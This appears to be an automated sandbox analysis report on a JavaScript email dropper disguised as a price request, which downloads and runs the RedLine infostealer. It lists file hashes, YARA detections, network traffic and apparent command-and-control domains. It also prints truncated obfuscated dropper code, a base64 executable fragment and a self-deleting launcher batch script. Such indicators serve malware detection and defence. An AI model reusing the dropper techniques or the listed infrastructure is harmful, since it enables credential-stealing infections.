                                              Preview:xLplQOnpEnZAdTl = "" ..SOuwzAeyuFjYc = 191;..var iiEDHtGOFFexgJcFM = "OhYskmbOPLqjWNIwewPfOZS";..PBNJQyTrBsirBzjyw = 16;..var dpriQfirVBBMNaxoPJqXdKPwUoqoVGwvyTBZhkzWeRvxReoRlCmqsbSSZuNbouVPEGO = "uZXHfJUsMPSfqAZCTUFCXAizmWXikvgsKQtsNvHgYjGDHPXbOrCuzEqtqYUImlHQjZVaGhpYNZeotfsXzvTttltGZABpayumbqThtxVhBehZZCzLfxJqSNWxgPAGfAxOfrMDLLdBalsPETgWAqJdpDUOTVAewPCBgSuiqwzUTHQ";..xLplQOnpEnZAdTl = xLplQOnpEnZAdTl + "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABoEIQtLHHqfixx6n4scep+MiN/fj9x6n4Lt5F+K3Hqfixx635ccep+MiNufhxx6n4yI2l+onHqfjIje34tcep+UmljaCxx6n4AAAAAAAAAAAAAAAAAAAAAI5C3XgAAAABQRQAATAEEAHSlAFAAAAAAAAAAAOAAIwELAQkAAJgBAACiAQAAAAAAL80AAAAQAAAAsAEAAABAAAAQAAAAAgAABQAAAAAAAAAFAAAAAAAAAACAAwAABAAA+zsCAAIAAIAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAALQVAgBQAAAAAGACAAAdAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAsQEAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKANAgBAAAAAAAAAAAAAAAAAsAE

                                              C:\Users\user\AppData\Local\Temp\IDWYPJ.js

                                              Download File
                                              Process:C:\Windows\System32\wscript.exe
                                              File Type:ASCII text, with very long lines (65164), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):305955
                                              Entropy (8bit):5.79663316602609
                                              Encrypted:false
                                              SSDEEP:6144:UaP0cFRNUIo3Ip9Sb11SbTAb1++tsnXkZUe/xOrQ0dESZy:zPdbNUIo3lb11SfAb1++tsnXO+Q0dLZy
                                              MD5:543BA48603F0ACCD9C3AE7A76E6A53C8
                                              SHA1:1BD9FB9375EC9DB0900F7EB09781AE6B57D33FFE
                                              SHA-256:BB31D8123C3B351AF8B7A851A9187E9E93394ACDA05B8DF5DC90BEB6939BAA78
                                              SHA-512:A446DE01D532DBEE3D8AC8625DB093CB5BE15E02FA68BD366F7E365E436D782B5F66C7762986B0A6B8D78812B34B852C272BD03ED56D6F603DF6EC3873C9D24F
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              Reputation:low
                                              Preview:xLplQOnpEnZAdTl = "" ..SOuwzAeyuFjYc = 191;..var iiEDHtGOFFexgJcFM = "OhYskmbOPLqjWNIwewPfOZS";..PBNJQyTrBsirBzjyw = 16;..var dpriQfirVBBMNaxoPJqXdKPwUoqoVGwvyTBZhkzWeRvxReoRlCmqsbSSZuNbouVPEGO = "uZXHfJUsMPSfqAZCTUFCXAizmWXikvgsKQtsNvHgYjGDHPXbOrCuzEqtqYUImlHQjZVaGhpYNZeotfsXzvTttltGZABpayumbqThtxVhBehZZCzLfxJqSNWxgPAGfAxOfrMDLLdBalsPETgWAqJdpDUOTVAewPCBgSuiqwzUTHQ";..xLplQOnpEnZAdTl = xLplQOnpEnZAdTl + "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA4AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABoEIQtLHHqfixx6n4scep+MiN/fj9x6n4Lt5F+K3Hqfixx635ccep+MiNufhxx6n4yI2l+onHqfjIje34tcep+UmljaCxx6n4AAAAAAAAAAAAAAAAAAAAAI5C3XgAAAABQRQAATAEEAHSlAFAAAAAAAAAAAOAAIwELAQkAAJgBAACiAQAAAAAAL80AAAAQAAAAsAEAAABAAAAQAAAAAgAABQAAAAAAAAAFAAAAAAAAAACAAwAABAAA+zsCAAIAAIAAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAALQVAgBQAAAAAGACAAAdAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAsQEAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKANAgBAAAAAAAAAAAAAAAAAsAE

                                              C:\Users\user\AppData\Local\Temp\NaE.exe

                                              Download File
                                              Process:C:\Windows\System32\wscript.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):212480
                                              Entropy (8bit):7.334840894349961
                                              Encrypted:false
                                              SSDEEP:3072:TDKW1LgppLRHMY0TBfJvjcTp5Xint9AyPAObCts4CfbQVQwSQwn1cxj:TDKW1Lgbdl0TBBvjc/iXdoNtYfUbSp8j
                                              MD5:E05EDADFDDE523064F35BA05A09B55D5
                                              SHA1:48FB08A5186F47B3084585ADE19513DC2B3BA4D8
                                              SHA-256:4C85F51EA7859BB085B597C10A1AFF5E6B994EF8CB071E0571C939EE5BE89F8B
                                              SHA-512:AA6F42BF72D6B80052B813DB695FA98B93931187478B784474BAFD01CD10DF131FFD39FBE1E9D9EDE81B81FCEA1A3BA68E9C694FE12D86941859D5FBD1C0C73C
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\NaE.exe, Author: Joe Security
                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\NaE.exe, Author: ditekSHen
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 75%
                                              • Antivirus: Virustotal, Detection: 62%, Browse
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~................#..^....PE..L...t..P..........#................./.............@..................................;..........................................P....`..................................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc........`....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\audio.exe

                                              Download File
                                              Process:C:\Users\user\AppData\Local\Temp\NaE.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):212480
                                              Entropy (8bit):7.334840894349961
                                              Encrypted:false
                                              SSDEEP:3072:TDKW1LgppLRHMY0TBfJvjcTp5Xint9AyPAObCts4CfbQVQwSQwn1cxj:TDKW1Lgbdl0TBBvjc/iXdoNtYfUbSp8j
                                              MD5:E05EDADFDDE523064F35BA05A09B55D5
                                              SHA1:48FB08A5186F47B3084585ADE19513DC2B3BA4D8
                                              SHA-256:4C85F51EA7859BB085B597C10A1AFF5E6B994EF8CB071E0571C939EE5BE89F8B
                                              SHA-512:AA6F42BF72D6B80052B813DB695FA98B93931187478B784474BAFD01CD10DF131FFD39FBE1E9D9EDE81B81FCEA1A3BA68E9C694FE12D86941859D5FBD1C0C73C
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\audio.exe, Author: Joe Security
                                              • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\audio.exe, Author: ditekSHen
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 75%
                                              • Antivirus: Virustotal, Detection: 62%, Browse
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......h..-,q.~,q.~,q.~2#.~?q.~...~+q.~,q.~\q.~2#n~.q.~2#i~.q.~2#{~-q.~Rich,q.~................#..^....PE..L...t..P..........#................./.............@..................................;..........................................P....`..................................................................@............................................text............................... ..`.rdata...m.......n..................@..@.data....0... ......................@....rsrc........`....... ..............@..@................................................................................................................................................................................................................................................................................................................................................................................

                                              C:\Users\user\AppData\Local\Temp\tmpAB92.tmp.bat

                                              Download File
                                              Process:C:\Users\user\AppData\Local\Temp\NaE.exe
                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):154
                                              Entropy (8bit):4.999772768834574
                                              Encrypted:false
                                              SSDEEP:3:mKDDCMNqTtvL5oCHyg4E2J5xAIt6KJymqRDCHyg4E2J5xAInTRIOmLRIVL1ZPy:hWKqTtT6CHhJ23fthJymq1CHhJ23fTva
                                              MD5:5AA2EA6EAAC4DAD8BB00646E66EA9B86
                                              SHA1:A5CAD671FDD739C34582507157C316806AB2C793
                                              SHA-256:9FAF742A2870DC9039CC0CEA9CD778EED11D0DB0A0924EF112458D2A0329DCD7
                                              SHA-512:52A8105166E637464A86D5B21FD3A987BE98D83ACFAAF61C3470168B840F24BD9EB5C49E2BE4B67D2B25E6353A84C92AA5C382C969454FF888AAB825834E9077
                                              Malicious:false
                                              Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Local\Temp\audio.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpAB92.tmp.bat" /f /q..

                                              \Device\Null

                                              Download File
                                              Process:C:\Windows\SysWOW64\timeout.exe
                                              File Type:ASCII text, with CRLF line terminators, with overstriking
                                              Category:dropped
                                              Size (bytes):60
                                              Entropy (8bit):4.41440934524794
                                              Encrypted:false
                                              SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                              MD5:3DD7DD37C304E70A7316FE43B69F421F
                                              SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                              SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                              SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                              Malicious:false
                                              Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..

                                              Static File Info

                                              General

                                              File type:ASCII text, with very long lines (8195), with CRLF line terminators
                                              Entropy (8bit):3.6292123257048012
                                              TrID:
                                                File name:Price request N#U00b0DEM23000199.js
                                                File size:8'229 bytes
                                                MD5:58cd571807ec7624c3f5865fade24891
                                                SHA1:ac42e6e8be1c0521aebecebc6b1eb75c75e761fa
                                                SHA256:3eaae1b3f71898ceac37bd6a7779ed9e821d06a1004ff5f527922ae6c9066082
                                                SHA512:36401a2383b0ba998e269201e92f2a1b9b254b1a44027755a8464cfde523f19c8dc1632339aa01501580eba53f75087b389e695a69539dbf418b63de6573ab11
                                                SSDEEP:192:9ngcP7iPwPTkP9A4mx/1DPbnnTBTOSn8nOyvk6BPHBHDSyDhquPdPYlccP0SBPw9:9ngcP7iPwPTkP9A4mx/1DPbnnTBTOSnu
                                                TLSH:D20246C4CD4892F84D073C8A2A9715A35F98D1DECCAA738EC9C7F7950C9FC51C929A82
                                                File Content Preview:var U1s=258393352..var GFDESM = String.fromCharCode(258393468-U1s,258393466-U1s,258393473-U1s,258393475-U1s,258393362-U1s,258393470-U1s,258393449-U1s,258393466-U1s,258393384-U1s,258393431-U1s,258393450-U1s,258393458-U1s,258393453-U1s,258393451-U1s,2583934

                                                File Icon

                                                Icon Hash:68d69b8bb6aa9a86

                                                Network Behavior

                                                Snort IDS Alerts

                                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                04/24/24-07:00:34.140261TCP2018856ET TROJAN Windows executable base64 encoded4434970551.254.27.105192.168.2.8

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Apr 24, 2024 07:00:32.825963020 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:32.826009989 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:32.826112032 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:32.834708929 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:32.834722996 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:33.467469931 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:33.467700005 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:33.542571068 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:33.542592049 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:33.543732882 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:33.543827057 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:33.546345949 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:33.592153072 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:34.140377998 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:34.140512943 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:34.140527010 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:34.140577078 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:34.449639082 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:34.449662924 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:34.449692965 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:34.449752092 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:34.449769020 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:34.449815035 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:34.450612068 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:34.450639009 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:34.450711966 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:34.450720072 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:34.450740099 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:34.450758934 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:34.759018898 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:34.759044886 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:34.759175062 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:34.759185076 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:34.759246111 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:34.759691000 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:34.759705067 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:34.759758949 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:34.759763002 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:34.759803057 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:34.760525942 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:34.760541916 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:34.760721922 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:34.760725975 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:34.760783911 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.068365097 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.068392992 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.068552971 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.068567038 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.068613052 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.069802999 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.069820881 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.069904089 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.069911957 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.069957018 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.070662975 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.070679903 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.070751905 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.070755959 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.070799112 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.070802927 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.070842981 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.071943045 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.071976900 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.072021008 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.072026014 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.072062016 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.072082996 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.073060989 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.073077917 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.073149920 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.073153973 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.073196888 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.073972940 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.073991060 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.074054003 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.074059010 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.074103117 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.377412081 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.377429962 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.377453089 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.377518892 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.377538919 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.377552032 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.377585888 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.378160954 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.378177881 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.378242970 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.378248930 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.378288984 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.378886938 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.378906965 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.378977060 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.378988981 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.379065037 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.379749060 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.379770041 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.379827976 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.379834890 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.379873991 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.380666018 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.380693913 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.380738020 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.380748034 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.380753040 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.380781889 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.380794048 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.381572962 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.381597996 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.381647110 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.381653070 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.381664991 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.381684065 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.382396936 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.382421970 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.382483006 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.382488012 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.382525921 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.383019924 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.383059978 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.383095980 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.383095980 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:35.383119106 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.383137941 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.383338928 CEST49705443192.168.2.851.254.27.105
                                                Apr 24, 2024 07:00:35.383356094 CEST4434970551.254.27.105192.168.2.8
                                                Apr 24, 2024 07:00:50.701858997 CEST497082703192.168.2.8178.73.192.3
                                                Apr 24, 2024 07:00:51.715372086 CEST497082703192.168.2.8178.73.192.3
                                                Apr 24, 2024 07:00:53.731019974 CEST497082703192.168.2.8178.73.192.3
                                                Apr 24, 2024 07:00:57.746624947 CEST497082703192.168.2.8178.73.192.3
                                                Apr 24, 2024 07:01:05.778012037 CEST497082703192.168.2.8178.73.192.3
                                                Apr 24, 2024 07:01:16.810688972 CEST4971049746192.168.2.8178.73.192.3
                                                Apr 24, 2024 07:01:17.825066090 CEST4971049746192.168.2.8178.73.192.3
                                                Apr 24, 2024 07:01:19.840451002 CEST4971049746192.168.2.8178.73.192.3
                                                Apr 24, 2024 07:01:23.856062889 CEST4971049746192.168.2.8178.73.192.3
                                                Apr 24, 2024 07:01:31.871671915 CEST4971049746192.168.2.8178.73.192.3
                                                Apr 24, 2024 07:01:44.299029112 CEST497126974192.168.2.8141.101.134.51
                                                Apr 24, 2024 07:01:45.309206009 CEST497126974192.168.2.8141.101.134.51
                                                Apr 24, 2024 07:01:47.309128046 CEST497126974192.168.2.8141.101.134.51
                                                Apr 24, 2024 07:01:51.309186935 CEST497126974192.168.2.8141.101.134.51
                                                Apr 24, 2024 07:01:59.309192896 CEST497126974192.168.2.8141.101.134.51
                                                Apr 24, 2024 07:02:10.328032017 CEST497136974192.168.2.8141.101.134.51
                                                Apr 24, 2024 07:02:11.340445995 CEST497136974192.168.2.8141.101.134.51
                                                Apr 24, 2024 07:02:13.356081009 CEST497136974192.168.2.8141.101.134.51
                                                Apr 24, 2024 07:02:17.371728897 CEST497136974192.168.2.8141.101.134.51
                                                Apr 24, 2024 07:02:25.387878895 CEST497136974192.168.2.8141.101.134.51
                                                Apr 24, 2024 07:02:36.421996117 CEST4971449746192.168.2.8141.101.134.51
                                                Apr 24, 2024 07:02:37.434190989 CEST4971449746192.168.2.8141.101.134.51
                                                Apr 24, 2024 07:02:39.449939013 CEST4971449746192.168.2.8141.101.134.51

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Apr 24, 2024 07:00:31.946762085 CEST6122853192.168.2.81.1.1.1
                                                Apr 24, 2024 07:00:32.820276976 CEST53612281.1.1.1192.168.2.8
                                                Apr 24, 2024 07:00:50.420084953 CEST5727853192.168.2.81.1.1.1
                                                Apr 24, 2024 07:00:50.698926926 CEST53572781.1.1.1192.168.2.8
                                                Apr 24, 2024 07:01:42.904743910 CEST5927653192.168.2.81.1.1.1
                                                Apr 24, 2024 07:01:43.918864012 CEST5927653192.168.2.81.1.1.1
                                                Apr 24, 2024 07:01:44.298192978 CEST53592761.1.1.1192.168.2.8
                                                Apr 24, 2024 07:01:44.298212051 CEST53592761.1.1.1192.168.2.8

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Apr 24, 2024 07:00:31.946762085 CEST192.168.2.81.1.1.10x20e3Standard query (0)postutopia.netA (IP address)IN (0x0001)false
                                                Apr 24, 2024 07:00:50.420084953 CEST192.168.2.81.1.1.10x6674Standard query (0)chongmei33.publicvm.comA (IP address)IN (0x0001)false
                                                Apr 24, 2024 07:01:42.904743910 CEST192.168.2.81.1.1.10x2c68Standard query (0)chonglee575.duckdns.orgA (IP address)IN (0x0001)false
                                                Apr 24, 2024 07:01:43.918864012 CEST192.168.2.81.1.1.10x2c68Standard query (0)chonglee575.duckdns.orgA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Apr 24, 2024 07:00:32.820276976 CEST1.1.1.1192.168.2.80x20e3No error (0)postutopia.net51.254.27.105A (IP address)IN (0x0001)false
                                                Apr 24, 2024 07:00:50.698926926 CEST1.1.1.1192.168.2.80x6674No error (0)chongmei33.publicvm.com178.73.192.3A (IP address)IN (0x0001)false
                                                Apr 24, 2024 07:01:44.298192978 CEST1.1.1.1192.168.2.80x2c68No error (0)chonglee575.duckdns.org141.101.134.51A (IP address)IN (0x0001)false
                                                Apr 24, 2024 07:01:44.298212051 CEST1.1.1.1192.168.2.80x2c68No error (0)chonglee575.duckdns.org141.101.134.51A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • postutopia.net

                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.84970551.254.27.1054437492C:\Windows\System32\wscript.exe
                                                TimestampBytes transferredDirectionData
                                                2024-04-24 05:00:33 UTC350OUTGET /wp-includes/images/smilies/wp.js HTTP/1.1
                                                Accept: */*
                                                Accept-Language: en-ch
                                                UA-CPU: AMD64
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                Host: postutopia.net
                                                Connection: Keep-Alive
                                                2024-04-24 05:00:34 UTC455INHTTP/1.1 200 OK
                                                Connection: close
                                                content-type: application/octet-stream
                                                last-modified: Tue, 23 Apr 2024 00:08:36 GMT
                                                accept-ranges: bytes
                                                content-length: 305955
                                                date: Wed, 24 Apr 2024 05:00:33 GMT
                                                server: LiteSpeed
                                                vary: User-Agent
                                                content-disposition: attachment
                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
